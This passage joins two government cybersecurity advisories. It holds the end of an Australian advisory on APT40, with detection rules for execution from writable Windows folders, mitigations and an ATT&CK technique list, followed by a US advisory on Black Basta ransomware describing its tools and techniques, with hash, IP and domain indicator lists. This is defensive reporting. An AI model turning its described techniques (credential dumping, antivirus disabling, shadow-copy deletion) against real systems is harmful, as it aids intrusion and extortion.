2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log source: category: process_creationproduct: windows Detection: writable_path:Image|contains: ‘:\\$Recycle.Bin\\’ ‘:\\AMD\\Temp\\’ ‘:\\Intel\\’ ‘:\\PerfLogs\\’ ‘:\\Windows\\addins\\’ ‘:\\Windows\\appcompat\\’ ‘:\\Windows\\apppatch\\’ ‘:\\Windows\\AppReadiness\\’ ‘:\\Windows\\bcastdvr\\’ ‘:\\Windows\\Boot\\’ ‘:\\Windows\\Branding\\’ ‘:\\Windows\\CbsTemp\\’ ‘:\\Windows\\Containers\\’ ‘:\\Windows\\csc\\’ ‘:\\Windows\\Cursors\\’ ‘:\\Windows\\debug\\’ ‘:\\Windows\\diagnostics\\’ ‘:\\Windows\\DigitalLocker\\’ ‘:\\Windows\\dot3svc\\’ ‘:\\Windows\\en-US\\’ ‘:\\Windows\\Fonts\\’ ‘:\\Windows\\Globalization\\’ ‘:\\Windows\\Help\\’ ‘:\\Windows\\IdentityCRL\\’ ‘:\\Windows\\IME\\’ ‘:\\Windows\\ImmersiveControlPanel\\’ ‘:\\Windows\\INF\\’ ‘:\\Windows\\intel\\’ ‘:\\Windows\\L2Schemas\\’ ‘:\\Windows\\LiveKernelReports\\’ ‘:\\Windows\\Logs\\’ ‘:\\Windows\\media\\’ ‘:\\Windows\\Migration\\’ ‘:\\Windows\\ModemLogs\\’ ‘:\\Windows\\ms\\’ ‘:\\Windows\\OCR\\’ ‘:\\Windows\\panther\\’ ‘:\\Windows\\Performance\\’ ‘:\\Windows\\PLA\\’ ‘:\\Windows\\PolicyDefinitions\\’ ‘:\\Windows\\Prefetch\\’ ‘:\\Windows\\PrintDialog\\’ ‘:\\Windows\\Provisioning\\’ ‘:\\Windows\\Registration\\CRMLog\\’ ‘:\\Windows\\RemotePackages\\’ ‘:\\Windows\\rescache\\’ ‘:\\Windows\\Resources\\’ ‘:\\Windows\\SchCache\\’ ‘:\\Windows\\schemas\\’ ‘:\\Windows\\security\\’ ‘:\\Windows\\ServiceState\\’ ‘:\\Windows\\servicing\\’ ‘:\\Windows\\Setup\\’ ‘:\\Windows\\ShellComponents\\’ ‘:\\Windows\\ShellExperiences\\’ ‘:\\Windows\\SKB\\’ ‘:\\Windows\\TAPI\\’ ‘:\\Windows\\Tasks\\’ ‘:\\Windows\\TextInput\\’ ‘:\\Windows\\tracing\\’ ‘:\\Windows\\Vss\\’ ‘:\\Windows\\WaaS\\’ ‘:\\Windows\\Web\\’ ‘:\\Windows\\wlansvc\\’ ‘:\\Windows\\System32\\Com\\dmp\\’ ‘:\\Windows\\System32\\FxsTmp\\’ ‘:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\’ ‘:\\Windows\\System32\\Speech\\’ ‘:\\Windows\\System32\\spool\\drivers\\color\\’ ‘:\\Windows\\System32\\spool\\PRINTERS\\’ ‘:\\Windows\\System32\\spool\\SERVERS\\’ ‘:\\Windows\\System32\\Tasks_Migrated\\Microsoft\\Windows\\PLA\\System\\’ ‘:\\Windows\\System32\\Tasks\\’ ‘:\\Windows\\SysWOW64\\Com\\dmp\\’ ‘:\\Windows\\SysWOW64\\FxsTmp\\’ ‘:\\Windows\\SysWOW64\\Tasks\\’ appdata:Image|contains: ‘\\AppData\\’User: ‘SYSTEM’condition: writable_path and not appdata False positives: Allowlist auditing applications have been observed running executables from these directories. It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in one of these directories and should be addressed on a case-by-case basis. Level: high Title: World Writable Execution – Users ID: 6dda3843-182a-4214-9263-925a80b4c634 Description: Detect process execution from C:\Users\Public\* and other world writable folders within Users. Background: AppData folders are excluded if a file is run as SYSTEM – this is a benign way in which many temporary application files are executed. Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate. References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log source: category: process_creationproduct: windows Detection:users:Image|contains: ‘:\\Users\\All Users\\’ ‘:\\Users\\Contacts\\’ ‘:\\Users\\Default\\’ ‘:\\Users\\Public\\’ ‘:\\Users\\Searches\\’ appdata:Image|contains: ‘\\AppData\\’User: ‘SYSTEM’condition: users and not appdata False positives: It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis. Level: medium Mitigations Logging During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs. ASD’s ACSC recommends reviewing and implementing their guidance on Windows Event Logging and Forwarding including the configuration files and scripts in the Windows Event Logging Repository and the Information Security Manual’s Guidelines for System Monitoring, to include centralizing logs and retaining logs for a suitable period. Patch Management Promptly patch all internet exposed devices and services, including web servers, web applications, and remote access gateways. Consider implementing a centralized patch management system to automate and expedite the process. ASD’s ACSC recommend implementation of the ISM’s Guidelines for System Management, specifically, the System Patching controls where applicable. Most exploits utilized by the actor were publicly known and had patches or mitigations available. Organizations should ensure that security patches or mitigations are applied to internet facing infrastructure within 48 hours, and where possible, use the latest versions of software and operating systems. Network Segmentation Network segmentation can make it significantly more difficult for adversaries to locate and gain access to an organizations sensitive data. Segment networks to limit or block lateral movement by denying traffic between computers unless required. Important servers such as Active Directory and other authentication servers should only be able to be administered from a limited number of intermediary servers or “jump servers.” These servers should be closely monitored, be well secured and limit which users and devices are able to connect to them. Regardless of instances identified where lateral movement is prevented, additional network segmentation could have further limited the amount of data the actors were able to access and extract. Additional Mitigations The authoring agencies also recommend the following mitigations to combat APT40 and others’ use of the TTPs below. Disable unused or unnecessary network services, ports and protocols. Use well-tuned Web application firewalls (WAFs) to protect webservers and applications. Enforce least privilege to limit access to servers, file shares, and other resources. Use multi-factor authentication (MFA) and managed service accounts to make credentials harder to crack and reuse. MFA should be applied to all internet accessible remote access services, including: Web and cloud-based email; Collaboration platforms; Virtual private network connections; and Remote desktop services. Replace end-of-life equipment. Mitigation Strategies/Techniques TTP Essential Eight Mitigation Strategies ISM Controls Initial Access T1190 Exploitation of Public-Facing Application Patch applications Patch operating systems Multi-factor authentication Application control ISM-0140 ISM-1698 ISM-1701 ISM-1921 ISM-1876 ISM-1877 ISM-1905 Execution T1059 Command and Scripting Interpreter Application control Restrict Microsoft Office macros Restrict administrative privileges ISM-0140 ISM-1490 ISM-1622 ISM-1623 ISM-1657 ISM-1890 Persistence T1505.003 Server Software Component: Web Shell Application Control Restrict administrative privileges ISM-0140 ISM-1246 ISM-1746 ISM-1249 ISM-1250 ISM-1490 ISM-1657 ISM-1871 Initial Access / Privilege Escalation / Persistence T1078 Valid Accounts Patch operating systems Multi-factor authentication Restrict administrative privileges Application control User application hardening ISM-0140 ISM-0859 ISM-1546 ISM-1504 ISM-1679 For additional general detection and mitigation advice, please consult the Mitigations and Detection sections on the MITRE ATT&CK technique web page for each of the techniques identified in the MITRE ATT&CK summary at the end of this advisory. Reporting Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories. Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: report a significant cyber security incident at National Cyber Security Centre (monitored 24 hours) or, for urgent assistance, call 03000 200 973. U.S. organizations: report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office, the FBI’s 24/7 CyWatch at (855) 292-3937, or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Disclaimer The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. MITRE ATT&CK – Historical APT40 Tradecraft of Interest Reconnaissance (TA0043) Search Victim-Owned Websites [T1594]   Gather Victim Identity Information: Credentials [T1589.001]  Active Scanning: Vulnerability Scanning [T1595.002]  Gather Victim Host Information [T1592] Search Open Websites/Domains: Search Engines [T1593.002] Gather Victim Network Information: Domain Properties [T1590.001] Gather Victim Identity Information: Email Addresses [T1589.002]   Resource Development (TA0042) Acquire Infrastructure: Domains [T1583.001]   Acquire Infrastructure [T1583] Acquire Infrastructure: DNS Server [T1583.002]   Compromise Accounts [T1586] Develop Capabilities: Code Signing Certificates [T1587.002]  Compromise Infrastructure [T1584] Develop Capabilities: Digital Certificates [T1587.003]  Develop Capabilities: Malware [T1587.001] Obtain Capabilities: Code Signing Certificates [T1588.003] Establish Accounts: Cloud Accounts [T1585.003] Compromise Infrastructure: Network Devices [T1584.008] Obtain Capabilities: Digital Certificates [T1588.004] Initial Access (TA0001) Valid Accounts [T1078]  Phishing [T1566] Valid Accounts: Default Accounts [T1078.001]   Phishing: Spearphishing Attachment [T1566.001]   Valid Accounts: Domain Accounts [T1078.002]   Phishing: Spearphishing Link [T1566.002] External Remote Services [T1133] Exploit Public-Facing Application [T1190] Drive-by Compromise [T1189]    Execution (TA0002) Windows Management Instrumentation [T1047]   Command and Scripting Interpreter: Python [T1059.006]  Scheduled Task/Job: At [T1053.002]  Command and Scripting Interpreter: JavaScript [T1059.007]  Scheduled Task/Job: Scheduled Task [T1053.005]   Native API [T1106]  Command and Scripting Interpreter [T1059]   Inter-Process Communication [T1559]  Command and Scripting Interpreter: Windows Command Shell [T1059.003]  System Services: Service Execution [T1569.002]   Command and Scripting Interpreter: PowerShell [T1059.001]  Exploitation for Client Execution [T1203]   Command and Scripting Interpreter: Visual Basic [T1059.005]  User Execution: Malicious File [T1204.002]   Command and Scripting Interpreter: Unix Shell [T1059.004] Command and Scripting Interpreter: Apple Script [T1059.002] Scheduled Task/Job: Cron [T1053.003] Software Deployment Tools [T1072] Persistence (TA0003) Valid Accounts [T1078]  Server Software Component: Web Shell [T1505.003]  Office Application Startup: Office Template Macros [T1137.001] Create or Modify System Process: Windows Service [T1543.003]  Scheduled Task/Job: At [T1053.002]  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]  Scheduled Task/Job: Scheduled Task [T1053.005]   Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]  External Remote Services [T1133]  Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]  Scheduled Task/Job: Cron [T1053.003]   Hijack Execution Flow: DLL Side-Loading [T1574.002]  Account Manipulation [T1098] Valid Accounts: Cloud Accounts [T1078.004] Valid Accounts: Domain Accounts [T1078.002]   Privilege Escalation (TA0004) Scheduled Task/Job: At [T1053.002]  Create or Modify System Process: Windows Service [T1543.003]  Scheduled Task/Job: Scheduled Task [T1053.005]   Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]  Process Injection: Thread Execution Hijacking [T1055.003]  Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]  Process Injection: Process Hollowing [T1055.012] Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] Valid Accounts: Domain Accounts [T1078.002] Exploitation for Privilege Escalation [T1068] Access Token Manipulation: Token Impersonation/Theft [T1134.001] Event Triggered Execution: Unix Shell Configuration Modification [T1546.004] Process Injection: Dynamic-link Library Injection [T1055.001] Valid Accounts: Domain Accounts [T1078.002] Valid Accounts: Local Accounts [T1078.003]   Defense Evasion (TA0005) Rootkit [T1014]  Indirect Command Execution [T1202]  Obfuscated Files or Information [T1027]   System Binary Proxy Execution: Mshta [T1218.005]  Obfuscated Files or Information: Software Packing [T1027.002]  System Binary Proxy Execution: Regsvr32 [T1218.010]  Obfuscated Files or Information: Steganography [T1027.003]  Subvert Trust Controls: Code Signing [T1553.002]  Obfuscated Files or Information: Compile After Delivery [T1027.004]  File and Directory Permissions Modifications: Linux and Mac File and Directory Permissions Modification [T1222.002]   Masquerading: Match Legitimate Name or Location [T1036.005]  Virtualisation/Sandbox Evasion: System Checks [T1497.001]  Process Injection: Thread Execution Hijacking [T1055.003] Masquerading [T1036] Reflective Code Loading [T1620] Impair Defences: Disable or Modify System Firewall [T1562.004]  Process Injection: Process Hollowing [T1055.012]  Hide Artifacts: Hidden Files and Directories [T1564.001]  Indicator Removal: File Deletion [T1070.004]   Hide Artifacts: Hidden Window [T1564.003]   Indicator Removal: Timestomp [T1070.006]   Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]  Indicator Removal: Clear Windows Event Logs [T1070.001] Hijack Execution Flow: DLL Side-Loading [T1574.002]  Modify Registry [T1112]  Web Service [T1102]  Deobfuscate/Decode Files or Information [T1140]  Masquerading: Masquerade Task or Service [T1036.004] Impair Defenses [T1562]   Credential Access (TA0006) OS Credential Dumping: LSASS Memory [T1003.001]   Unsecured Credentials: Credentials in Files [T1552.001] OS Credential Dumping: NTDS [T1003.003]   Brute Force: Password Guessing [T1110.001] Network Sniffing [T1040]  Forced Authentication [T1187] Credentials from Password Stores: Keychain [T1555.001] Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003]  Input Capture: Keylogging [T1056.001]  Multi-Factor Authentication Interception [T1111] Steal Web Session Cookie [T1539]  Steal Application Access Token [T1528] Exploitation for Credential Access [T1212] Brute Force: Password Cracking [T1110.002] Input Capture: Web Portal Capture [T1056.003] OS Credential Dumping: DCSync [T1003.006] Credentials from Password Stores [T1555]  Credentials from Password Stores: Credentials from Web Browsers [T1555.003] Discovery (TA0007) System Service Discovery [T1007]  System Information Discovery [T1082]   Application Window Discovery [T1010]   Account Discovery: Local Account [T1087.001]   Query Registry [T1012]  System Information Discovery, Technique T1082 – Enterprise | MITRE ATT&CK® File and Directory Discovery [T1083] System Time Discovery [T1124]  Network Service Discovery [T1046]  System Owner/User Discovery [T1033]  Remote System Discovery [T1018]  Domain Trust Discovery [T1482]  Account Discovery: Email Account [T1087.003] Account Discovery: Domain Account [T1087.002] System Network Connections Discovery [T1049]  Virtualisation/Sandbox Evasion: System Checks [T1497.001]  Process Discovery [T1057]  Software Discovery [T1518]  Permission Groups Discovery: Domain Groups [T1069.002]  Network Share Discovery, Technique T1135 – Enterprise | MITRE ATT&CK® System Network Configuration Discovery: Internet Connection Discovery [T1016.001]   Lateral Movement (TA0008) Remote Services: Remote Desktop Protocol [T1021.001]  Remote Services [T1021] Remote Services: SMB/Windows Admin Shares [T1021.002]  Use Alternate Authentication Material: Pass the Ticket [T1550.003] Remote Services: Windows Remote Management [T1021.006]  Lateral Tool Transfer [T1570]  Collection (TA0009) Data from Local System [T1005]  Archive Collected Data: Archive via Library [T1560.002] Data from Network Shared Drive [T1039]   Email Collection: Remote Email Collection [T1114.002]  Input Capture: Keylogging [T1056.001]  Clipboard Data [T1115]  Automated Collection [T1119] Data from Information Repositories [T1213] Input Capture: Web Portal Capture [T1056.003] Data Staged: Remote Data Staging [T1074.002]  Data Staged: Local Data Staging [T1074.001]  Archive Collected Data [T1560] Email Collection [T1114]   Exfiltration (TA0010) Exfiltration Over C2 Channel [T1041]   Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [T1048.002] Exfiltration Over Alternative Protocol [T1048]  Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002] Command and Control (TA0011) Data Obfuscation: Protocol Impersonation [T1001.003]  Web Service: Dead Drop Resolver [T1102.001]   Commonly Used Port [T1043]  Web Service: One-way Communication [T1102.003] Application Layer Protocol: Web Protocols [T1071.001]  Ingress Tool Transfer [T1105]  Application Layer Protocol: File Transfer Protocols [T1071.002] Proxy: Internal Proxy [T1090.001] Proxy: External Proxy [T1090.002]  Non-Standard Port [T1571]  Proxy: Multi-hop Proxy [T1090.003]  Protocol Tunnelling [T1572]  Web Service: Bidirectional Communication [T1102.002]  Encrypted Channel [T1573]  Encrypted Channel: Asymmetric Cryptography [T1573.002] Ingress Tool Transfer [T1105] Proxy, Technique T1090 – Enterprise | MITRE ATT&CK®   Impact (TA0040) Service Stop [T1489]  Disk Wipe [T1561] System Shutdown/Reboot [T1529]  Resource Hijacking [T1496]  Notes [1] U.S. Department of Justice. 2021. Four Chinese Nationals Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including Infectious Disease Research.[2] In this context, an endpoint is a function of the web application.[3] Service accounts are not tied to individual users, but rather to services. In a Microsoft corporate domain, there are various kinds of accounts.[4] Mounting shares is the process of making files on a file system structure accessible to a user or user group.  

SUMMARY Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector. This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally. Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion URL (reachable through the Tor browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta TOR site, Basta News. Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information). Download the PDF version of this report: AA24-131A #StopRansomware: Black Basta (PDF, 613.62 KB ) AA24-131A #StopRansomware: Black Basta (Spanish) (PDF, 621.68 KB ) For a downloadable copy of IOCs, see: AA24-131A STIX XML (XML, 237.45 KB ) AA24-131A STIX JSON (JSON, 180.78 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Initial Access Black Basta affiliates primarily use spearphishing [T1566] to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.[1] Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709 [CWE-288] [T1190]. In some instances, affiliates have been observed abusing valid credentials [T1078]. Discovery and Execution Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\ [T1036].[1] Lateral Movement Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, Screen Connect, and Cobalt Strike beacons to assist with remote access and lateral movement. Privilege Escalation and Lateral Movement Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2] Exfiltration and Encryption Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Prior to exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [T1059.001] to disable antivirus products, and in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [T1562.001].[3] Once antivirus programs are terminated, a ChaCha20 algorithm with an RSA-4096 public key fully encrypts files [T1486]. A .basta or otherwise random file extension is added to file names and a ransom note titled readme.txt is left on the compromised system.[4] To further inhibit system recovery, affiliates use the vssadmin.exe program to delete volume shadow copies [T1490].[5] Leveraged Tools See Table 1 for publicly available tools and applications used by Black Basta affiliates. This includes legitimate tools repurposed for their operations. Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Table 1: Tools Used by Black Basta Affiliates Tool Name Description BITSAdmin A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers. Cobalt Strike A penetration testing tool used by security professions to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution. Mimikatz A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation. PSExec A tool designed to run programs and execute commands on remote systems. PowerShell A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. RClone A command line program used to sync files with cloud storage services such as Mega. SoftPerfect A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.  ScreenConnect Remote support, access, and meeting software that allows users to control devices remotely over the internet. Splashtop Remote desktop software that allows remote access to devices for support, access, and collaboration. WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts. MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory. Table 2: Black Basta ATT&CK Techniques for Initial Access Technique Title ID Use Phishing T1566 Black Basta affiliates have used spearphishing emails to obtain initial access. Exploit Public-Facing Application T1190 Black Basta affiliates have exploited ConnectWise vulnerability CVE-2024-1709 to obtain initial access. Table 3: Black Basta ATT&CK Techniques for Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation. Table 4: Black Basta ATT&CK Techniques for Defense Evasion Technique Title ID Use Masquerading T1036 Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as Intel or Dell, to evade detection. Impair Defenses: Disable or Modify Tools T1562.001 Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling. Black Basta affiliates have used PowerShell to disable antivirus products. Table 5: Black Basta ATT&CK Techniques for Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Black Basta affiliates have used PowerShell to disable antivirus products. Table 6: Black Basta ATT&CK Techniques for Impact Technique Title ID Use Inhibit System Recovery T1490 Black Basta affiliates have used the vssadmin.exe program to delete shadow copies.  Data Encrypted for Impact T1486 Black Basta affiliates have used a public key to fully encrypt files.    INDICATORS OF COMPROMISE See Table 7 for IOCs obtained from FBI investigations. Table 7: Malicious Files Associated with Black Basta Ransomware Hash Description 0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 rclone.exe d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e Winscp.exe 88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc DLL 58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd DLL 39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead DLL 5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 DLL 51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e DLL d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 DLL 5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 DLL 05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431 DLL a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 DLL 86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 DLL 07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799 DLL 96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be ELF 1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779 ELF 360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 ELF 0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a EXE 9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc EXE 62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 EXE 7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 EXE 350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd EXE 90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 EXE fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 EXE acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f EXE d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d EXE f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 EXE 723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 EXE ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e EXE fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f EXE df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 EXE 462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 EXE 3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a EXE 5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa EXE 37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 EXE 3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35 EXE 17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20 EXE 42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78 EXE 882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 EXE e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 EXE 0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e EXE 69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 EXE 3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a EXE 17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90 EXE b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 EXE See Tables 8–11 for IOCs obtained from trusted third-party reporting. Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains. Table 8: Network Indicators IP Address Description 66.249.66[.]18 0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net 66.249.66[.]18 my.2a91c002002.588027fa.dns.realbumblebee[.]net 66.249.66[.]18 fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net 95.181.173[.]227 adslsdfdsfmo[.]world   fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net 207.126.152[.]242 xkpal.d6597fa.dns.blocktoday.netnuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net 72.14.196[.]50 .rasapool[.]net, dns.trailshop[.]net 72.14.196[.]192 .rasapool[.]net 72.14.196[.]2 .rasapool[.]net 72.14.196[.]226 .rasapool[.]net 46.161.27[.]151   207.126.152[.]242 nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com 185.219.221[.]136   64.176.219[.]106   5.78.115[.]67 your-server[.]de 207.126.152[.]242 xkpal.1a4a64b6.dns.blocktoday[.]net 46.8.16[.]77   185.7.214[.]79 VPN Server 185.220.100[.]240 Tor exit 107.189.30[.]69 Tor exit 5.183.130[.]92   185.220.101[.]149 Tor exit 